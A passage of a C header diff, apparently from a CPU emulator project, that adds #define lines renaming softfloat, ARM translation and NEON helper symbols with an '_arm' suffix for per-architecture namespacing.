disas_neon_ls_insn disas_neon_ls_insn_arm +#define disas_thumb2_insn disas_thumb2_insn_arm +#define disas_thumb_insn disas_thumb_insn_arm +#define disas_vfp_insn disas_vfp_insn_arm +#define disas_vfp_v8_insn disas_vfp_v8_insn_arm +#define do_arm_semihosting do_arm_semihosting_arm +#define do_clz16 do_clz16_arm +#define do_clz8 do_clz8_arm +#define do_constant_folding do_constant_folding_arm +#define do_constant_folding_2 do_constant_folding_2_arm +#define do_constant_folding_cond do_constant_folding_cond_arm +#define do_constant_folding_cond2 do_constant_folding_cond2_arm +#define do_constant_folding_cond_32 do_constant_folding_cond_32_arm +#define do_constant_folding_cond_64 do_constant_folding_cond_64_arm +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_arm +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_arm +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_arm +#define do_ssat do_ssat_arm +#define do_usad do_usad_arm +#define do_usat do_usat_arm +#define do_v7m_exception_exit do_v7m_exception_exit_arm +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_arm +#define dummy_func dummy_func_arm +#define dummy_section dummy_section_arm +#define _DYNAMIC _DYNAMIC_arm +#define _edata _edata_arm +#define _end _end_arm +#define end_list end_list_arm +#define eq128 eq128_arm +#define ErrorClass_lookup ErrorClass_lookup_arm +#define error_copy error_copy_arm +#define error_exit error_exit_arm +#define error_get_class error_get_class_arm +#define error_get_pretty error_get_pretty_arm +#define error_setg_file_open error_setg_file_open_arm +#define estimateDiv128To64 estimateDiv128To64_arm +#define estimateSqrt32 estimateSqrt32_arm +#define excnames excnames_arm +#define excp_is_internal excp_is_internal_arm +#define extended_addresses_enabled extended_addresses_enabled_arm +#define extended_mpu_ap_bits extended_mpu_ap_bits_arm +#define extract32 extract32_arm +#define extract64 extract64_arm +#define extractFloat128Exp extractFloat128Exp_arm +#define extractFloat128Frac0 extractFloat128Frac0_arm +#define extractFloat128Frac1 extractFloat128Frac1_arm +#define extractFloat128Sign extractFloat128Sign_arm +#define extractFloat16Exp extractFloat16Exp_arm +#define extractFloat16Frac extractFloat16Frac_arm +#define extractFloat16Sign extractFloat16Sign_arm +#define extractFloat32Exp extractFloat32Exp_arm +#define extractFloat32Frac extractFloat32Frac_arm +#define extractFloat32Sign extractFloat32Sign_arm +#define extractFloat64Exp extractFloat64Exp_arm +#define extractFloat64Frac extractFloat64Frac_arm +#define extractFloat64Sign extractFloat64Sign_arm +#define extractFloatx80Exp extractFloatx80Exp_arm +#define extractFloatx80Frac extractFloatx80Frac_arm +#define extractFloatx80Sign extractFloatx80Sign_arm +#define fcse_write fcse_write_arm +#define find_better_copy find_better_copy_arm +#define find_default_machine find_default_machine_arm +#define find_desc_by_name find_desc_by_name_arm +#define find_first_bit find_first_bit_arm +#define find_paging_enabled_cpu find_paging_enabled_cpu_arm +#define find_ram_block find_ram_block_arm +#define find_ram_offset find_ram_offset_arm +#define find_string find_string_arm +#define find_type find_type_arm +#define _fini _fini_arm +#define flatrange_equal flatrange_equal_arm +#define flatview_destroy flatview_destroy_arm +#define flatview_init flatview_init_arm +#define flatview_insert flatview_insert_arm +#define flatview_lookup flatview_lookup_arm +#define flatview_ref flatview_ref_arm +#define flatview_simplify flatview_simplify_arm +#define flatview_unref flatview_unref_arm +#define float128_add float128_add_arm +#define float128_compare float128_compare_arm +#define float128_compare_internal float128_compare_internal_arm +#define float128_compare_quiet float128_compare_quiet_arm +#define float128_default_nan float128_default_nan_arm +#define float128_div float128_div_arm +#define float128_eq float128_eq_arm +#define float128_eq_quiet float128_eq_quiet_arm +#define float128_is_quiet_nan float128_is_quiet_nan_arm +#define float128_is_signaling_nan float128_is_signaling_nan_arm +#define float128_le float128_le_arm +#define float128_le_quiet float128_le_quiet_arm +#define float128_lt float128_lt_arm +#define float128_lt_quiet float128_lt_quiet_arm +#define float128_maybe_silence_nan float128_maybe_silence_nan_arm +#define float128_mul float128_mul_arm +#define float128_rem float128_rem_arm +#define float128_round_to_int float128_round_to_int_arm +#define float128_scalbn float128_scalbn_arm +#define float128_sqrt float128_sqrt_arm +#define float128_sub float128_sub_arm +#define float128ToCommonNaN float128ToCommonNaN_arm +#define float128_to_float32 float128_to_float32_arm +#define float128_to_float64 float128_to_float64_arm +#define float128_to_floatx80 float128_to_floatx80_arm +#define float128_to_int32 float128_to_int32_arm +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_arm +#define float128_to_int64 float128_to_int64_arm +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_arm +#define float128_unordered float128_unordered_arm +#define float128_unordered_quiet float128_unordered_quiet_arm +#define float16_default_nan float16_default_nan_arm +#define float16_is_quiet_nan float16_is_quiet_nan_arm +#define float16_is_signaling_nan float16_is_signaling_nan_arm +#define float16_maybe_silence_nan float16_maybe_silence_nan_arm +#define float16ToCommonNaN float16ToCommonNaN_arm +#define float16_to_float32 float16_to_float32_arm +#define float16_to_float64 float16_to_float64_arm +#define float32_abs float32_abs_arm +#define float32_add float32_add_arm +#define float32_chs float32_chs_arm +#define float32_compare float32_compare_arm +#define float32_compare_internal float32_compare_internal_arm +#define float32_compare_quiet float32_compare_quiet_arm +#define float32_default_nan float32_default_nan_arm +#define float32_div float32_div_arm +#define float32_eq float32_eq_arm +#define float32_eq_quiet float32_eq_quiet_arm +#define float32_exp2 float32_exp2_arm +#define float32_exp2_coefficients float32_exp2_coefficients_arm +#define float32_is_any_nan float32_is_any_nan_arm +#define float32_is_infinity float32_is_infinity_arm +#define float32_is_neg float32_is_neg_arm +#define float32_is_quiet_nan float32_is_quiet_nan_arm +#define float32_is_signaling_nan float32_is_signaling_nan_arm +#define float32_is_zero float32_is_zero_arm +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_arm +#define float32_le float32_le_arm +#define float32_le_quiet float32_le_quiet_arm +#define float32_log2 float32_log2_arm +#define float32_lt float32_lt_arm +#define float32_lt_quiet float32_lt_quiet_arm +#define float32_max float32_max_arm +#define float32_maxnum float32_maxnum_arm +#define float32_maxnummag float32_maxnummag_arm +#define float32_maybe_silence_nan float32_maybe_silence_nan_arm +#define float32_min float32_min_arm +#define float32_minmax float32_minmax_arm +#define float32_minnum float32_minnum_arm +#define float32_minnummag float32_minnummag_arm +#define float32_mul float32_mul_arm +#define float32_muladd float32_muladd_arm +#define float32_rem float32_rem_arm +#define float32_round_to_int float32_round_to_int_arm +#define float32_scalbn float32_scalbn_arm +#define float32_set_sign float32_set_sign_arm +#define float32_sqrt float32_sqrt_arm +#define float32_squash_input_denormal float32_squash_input_denormal_arm +#define float32_sub float32_sub_arm +#define float32ToCommonNaN float32ToCommonNaN_arm +#define float32_to_float128 float32_to_float128_arm +#define float32_to_float16 float32_to_float16_arm +#define float32_to_float64 float32_to_float64_arm +#define float32_to_floatx80 float32_to_floatx80_arm +#define float32_to_int16 float32_to_int16_arm +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_arm +#define float32_to_int32 float32_to_int32_arm +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_arm +#define float32_to_int64 float32_to_int64_arm +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_arm +#define float32_to_uint16 float32_to_uint16_arm +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_arm +#define float32_to_uint32 float32_to_uint32_arm +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_arm +#define float32_to_uint64 float32_to_uint64_arm +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_arm +#define float32_unordered float32_unordered_arm +#define float32_unordered_quiet float32_unordered_quiet_arm +#define float64_abs float64_abs_arm +#define float64_add float64_add_arm +#define float64_chs float64_chs_arm +#define float64_compare float64_compare_arm +#define float64_compare_internal float64_compare_internal_arm +#define float64_compare_quiet float64_compare_quiet_arm +#define float64_default_nan float64_default_nan_arm +#define float64_div float64_div_arm +#define float64_eq float64_eq_arm +#define float64_eq_quiet float64_eq_quiet_arm +#define float64_is_any_nan float64_is_any_nan_arm +#define float64_is_infinity float64_is_infinity_arm +#define float64_is_neg float64_is_neg_arm +#define float64_is_quiet_nan float64_is_quiet_nan_arm +#define float64_is_signaling_nan float64_is_signaling_nan_arm +#define float64_is_zero float64_is_zero_arm +#define float64_le float64_le_arm +#define float64_le_quiet float64_le_quiet_arm +#define float64_log2 float64_log2_arm +#define float64_lt float64_lt_arm +#define float64_lt_quiet float64_lt_quiet_arm +#define float64_max float64_max_arm +#define float64_maxnum float64_maxnum_arm +#define float64_maxnummag float64_maxnummag_arm +#define float64_maybe_silence_nan float64_maybe_silence_nan_arm +#define float64_min float64_min_arm +#define float64_minmax float64_minmax_arm +#define float64_minnum float64_minnum_arm +#define float64_minnummag float64_minnummag_arm +#define float64_mul float64_mul_arm +#define float64_muladd float64_muladd_arm +#define float64_rem float64_rem_arm +#define float64_round_to_int float64_round_to_int_arm +#define float64_scalbn float64_scalbn_arm +#define float64_set_sign float64_set_sign_arm +#define float64_sqrt float64_sqrt_arm +#define float64_squash_input_denormal float64_squash_input_denormal_arm +#define float64_sub float64_sub_arm +#define float64ToCommonNaN float64ToCommonNaN_arm +#define float64_to_float128 float64_to_float128_arm +#define float64_to_float16 float64_to_float16_arm +#define float64_to_float32 float64_to_float32_arm +#define float64_to_floatx80 float64_to_floatx80_arm +#define float64_to_int16 float64_to_int16_arm +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_arm +#define float64_to_int32 float64_to_int32_arm +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_arm +#define float64_to_int64 float64_to_int64_arm +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_arm +#define float64_to_uint16 float64_to_uint16_arm +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_arm +#define float64_to_uint32 float64_to_uint32_arm +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_arm +#define float64_to_uint64 float64_to_uint64_arm +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_arm +#define float64_trunc_to_int float64_trunc_to_int_arm +#define float64_unordered float64_unordered_arm +#define float64_unordered_quiet float64_unordered_quiet_arm +#define float_raise float_raise_arm +#define floatx80_add floatx80_add_arm +#define floatx80_compare floatx80_compare_arm +#define floatx80_compare_internal floatx80_compare_internal_arm +#define floatx80_compare_quiet floatx80_compare_quiet_arm +#define floatx80_default_nan floatx80_default_nan_arm +#define floatx80_div floatx80_div_arm +#define floatx80_eq floatx80_eq_arm +#define floatx80_eq_quiet floatx80_eq_quiet_arm +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_arm +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_arm +#define floatx80_le floatx80_le_arm +#define floatx80_le_quiet floatx80_le_quiet_arm +#define floatx80_lt floatx80_lt_arm +#define floatx80_lt_quiet floatx80_lt_quiet_arm +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_arm +#define floatx80_mul floatx80_mul_arm +#define floatx80_rem floatx80_rem_arm +#define floatx80_round_to_int floatx80_round_to_int_arm +#define floatx80_scalbn floatx80_scalbn_arm +#define floatx80_sqrt floatx80_sqrt_arm +#define floatx80_sub floatx80_sub_arm +#define floatx80ToCommonNaN floatx80ToCommonNaN_arm +#define floatx80_to_float128 floatx80_to_float128_arm +#define floatx80_to_float32 floatx80_to_float32_arm +#define floatx80_to_float64 floatx80_to_float64_arm +#define floatx80_to_int32 floatx80_to_int32_arm +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_arm +#define floatx80_to_int64 floatx80_to_int64_arm +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_arm +#define floatx80_unordered floatx80_unordered_arm +#define floatx80_unordered_quiet floatx80_unordered_quiet_arm +#define flush_icache_range flush_icache_range_arm +#define format_string format_string_arm +#define fp_decode_rm fp_decode_rm_arm +#define frame_dummy frame_dummy_arm +#define free_range free_range_arm +#define fstat64 fstat64_arm +#define futex_wait futex_wait_arm +#define futex_wake futex_wake_arm +#define gen_aa32_ld16s gen_aa32_ld16s_arm +#define gen_aa32_ld16u gen_aa32_ld16u_arm +#define gen_aa32_ld32u gen_aa32_ld32u_arm +#define gen_aa32_ld64 gen_aa32_ld64_arm +#define gen_aa32_ld8s gen_aa32_ld8s_arm +#define gen_aa32_ld8u gen_aa32_ld8u_arm +#define gen_aa32_st16 gen_aa32_st16_arm +#define gen_aa32_st32 gen_aa32_st32_arm +#define gen_aa32_st64 gen_aa32_st64_arm +#define gen_aa32_st8 gen_aa32_st8_arm +#define gen_adc gen_adc_arm +#define gen_adc_CC gen_adc_CC_arm +#define gen_add16 gen_add16_arm +#define gen_add_carry gen_add_carry_arm +#define gen_add_CC gen_add_CC_arm +#define gen_add_datah_offset gen_add_datah_offset_arm +#define gen_add_data_offset gen_add_data_offset_arm +#define gen_addq gen_addq_arm +#define gen_addq_lo gen_addq_lo_arm +#define gen_addq_msw gen_addq_msw_arm +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_arm +#define gen_arm_shift_im gen_arm_shift_im_arm +#define gen_arm_shift_reg gen_arm_shift_reg_arm +#define gen_bx gen_bx_arm +#define gen_bx_im gen_bx_im_arm +#define gen_clrex gen_clrex_arm +#define generate_memory_topology generate_memory_topology_arm +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_arm +#define gen_exception gen_exception_arm +#define gen_exception_insn gen_exception_insn_arm +#define gen_exception_internal gen_exception_internal_arm +#define gen_exception_internal_insn gen_exception_internal_insn_arm +#define gen_exception_return gen_exception_return_arm +#define gen_goto_tb gen_goto_tb_arm +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_arm +#define gen_helper_add_saturate gen_helper_add_saturate_arm +#define gen_helper_add_setq gen_helper_add_setq_arm +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_arm +#define gen_helper_clz32 gen_helper_clz32_arm +#define gen_helper_clz64 gen_helper_clz64_arm +#define gen_helper_clz_arm gen_helper_clz_arm_arm +#define gen_helper_cpsr_read gen_helper_cpsr_read_arm +#define gen_helper_cpsr_write gen_helper_cpsr_write_arm +#define gen_helper_crc32_arm gen_helper_crc32_arm_arm +#define gen_helper_crc32c gen_helper_crc32c_arm +#define gen_helper_crypto_aese gen_helper_crypto_aese_arm +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_arm +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_arm +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_arm +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_arm +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_arm +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_arm +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_arm +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_arm +#define gen_helper_double_saturate gen_helper_double_saturate_arm +#define gen_helper_exception_internal gen_helper_exception_internal_arm +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_arm +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_arm +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_arm +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_arm +#define gen_helper_get_user_reg gen_helper_get_user_reg_arm +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_arm +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_arm +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_arm +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_arm +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_arm +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_arm +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_arm +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_arm +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_arm +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_arm +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_arm +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_arm +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_arm +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_arm +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_arm +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_arm +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_arm +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_arm +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_arm +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_arm +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_arm +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_arm +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_arm +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_arm +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_arm +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_arm +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_arm +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_arm +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_arm +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_arm +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_arm +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_arm +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_arm +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_arm +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_arm +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_arm +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_arm +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_arm +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_arm +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_arm +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_arm +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_arm +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_arm +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_arm +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_arm +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_arm +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_arm +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_arm +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_arm +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_arm +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_arm +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_arm +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_arm +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_arm +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_arm +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_arm +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_arm +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_arm +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_arm +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_arm +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_arm +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_arm +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_arm +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_arm +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_arm +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_arm +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_arm +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_arm +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_arm +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_arm +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_arm +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_arm +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_arm +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_arm +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_arm +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_arm +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_arm +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_arm +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_arm +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_arm +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_arm +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_arm +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_arm +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_arm +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_arm +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_arm +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_arm +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_arm +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_arm +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_arm +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_arm +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_arm +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_arm +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_arm +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_arm +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_arm +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_arm +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_arm +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_arm +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_arm +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_arm +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_arm +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_arm +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_arm +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_arm +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_arm +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_arm +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_arm +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_arm +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_arm +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_arm +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_arm +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_arm +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_arm +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_arm +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_arm +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_arm +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_arm +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_arm +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_arm +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_arm +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_arm +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_arm +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_arm +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_arm +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_arm +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_arm +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_arm +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_arm +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_arm +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_arm +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_arm +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_arm +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_arm +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_arm +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_arm +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_arm +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_arm +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_arm +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_arm +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_arm +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_arm +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_arm +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_arm +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_arm +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_arm +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_arm +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_arm +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_arm +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_arm +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_arm +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_arm +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_arm +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_arm +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_arm +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_arm +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_arm +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_arm +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_arm +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_arm +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_arm +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_arm +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_arm +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_arm +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_arm +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_arm +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_arm +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_arm +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_arm +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_arm +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_arm +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_arm +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_arm +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_arm +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_arm +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_arm +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_arm +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_arm +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_arm +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_arm +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_arm +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_arm +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_arm +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_arm +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_arm +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_arm +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_arm +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_arm +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_arm +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_arm +#define gen_helper_neon_narrow_sat_s16 